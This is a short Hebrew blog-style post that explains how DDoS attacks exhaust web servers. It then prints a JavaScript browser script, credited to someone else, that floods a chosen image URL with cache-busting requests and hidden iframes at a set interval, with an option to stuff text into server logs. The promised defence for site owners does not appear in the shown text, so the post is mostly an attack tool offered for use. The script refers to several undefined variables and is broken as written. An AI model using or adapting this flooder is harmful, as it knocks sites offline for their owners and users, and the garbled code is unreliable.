DDOS או Distributed denial of service היא מתקפה די פשוטה שלא משנה מה מצליחה להפיל כבר מאז ראשית רשת האינטרנט להקריס שרתים וגם מחשבים ומכשירי IOT ציבוריים .
המתקפה מאוד פשוטה – "לייצר" מספיק תנועה מדומה עד שהשרת נשאר ללא זכרון ומעבר פנויים כדי לעבד בקשות משתמשים נוספות.
המתקפה בעבר גם פעלה על מגבלת החיבורי עצמה שכן כל שירות לרבות שרת APACHE מוגדר להקציב מראש בקשות למספר מוגבל של משתמשים.
צריכים להבין שכאשר נכנסים לכל אתר – יש עיבוד בצד השרת – בו המחשב או השרת מבצע עיבוד לבקשה על מנת להציג למשתמש את האתר, וכוללים בין היתר בקשות למסד נתונים, ובקשות לסיפרות PHP השונות כדי להציג משאבים נוספים בדף.
אבל גם אתרים סטאטיים שלא מסתמכים על קבצי PHP ומודולי שרת רבים – עדיין צריכים לבצע עיבוד בצד השרת למשל כדי להציג למשתמש תמונות, סרטונים, וכל משאב אחר, ביחוד משאבים דימניים – הכוונה משאבים שהם תוצעה של שליפה \ get או .echo מהמסד נתונים.
כעת למקפה עצמה.
כדי לייצר אותה צריכים רק דפדפן שתומך בjavascript , אתר עם תמונה וסבלנות.
להלן הקוד – חייב לציין אני לא כתבתי שום חלק בו – וגם לא מצאתי את החולשה הזו, אלא רק מסביר ומראה אותה כאן – וכמובן גם אציג לבעלי אתרים פתרון כדי שלא ניתן יהיה לתקוף אצליהם בצורה כזו.
var target = prompt("קישור לקובץ תמונה, חןבה / בסוף הקישור");
var speed = prompt("שלח בקשה כל [blank] miliseconds");
var msg = prompt("ניתן להעמיס עוד יותר על ידי שליחה של קשת טקסט ללוג השרת אותה ניתן להזין כאן");
function attack() {
var pic = new Image();
var rand1 = Math.floor(Math.random() * 99999999999999999999999999999999999999999999);
var rand2 = Math.floor(Math.random() * 99999999999999999999999999999999999999999999);
pic.src = 'http://'+target+"/?r="+rand;
document.body.innerHTML+='<iframe src='+target+'?daKillaOfZeeCache="'+rand1+ +' &msg= '+ msg + '"style="display:none;"></iframe>';
img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
img.setAttribute("src", targetURL + "?killinAllThatCacheYeah=" + rand2 + "&msg=" + msg);
}
setInterval(attack, speed);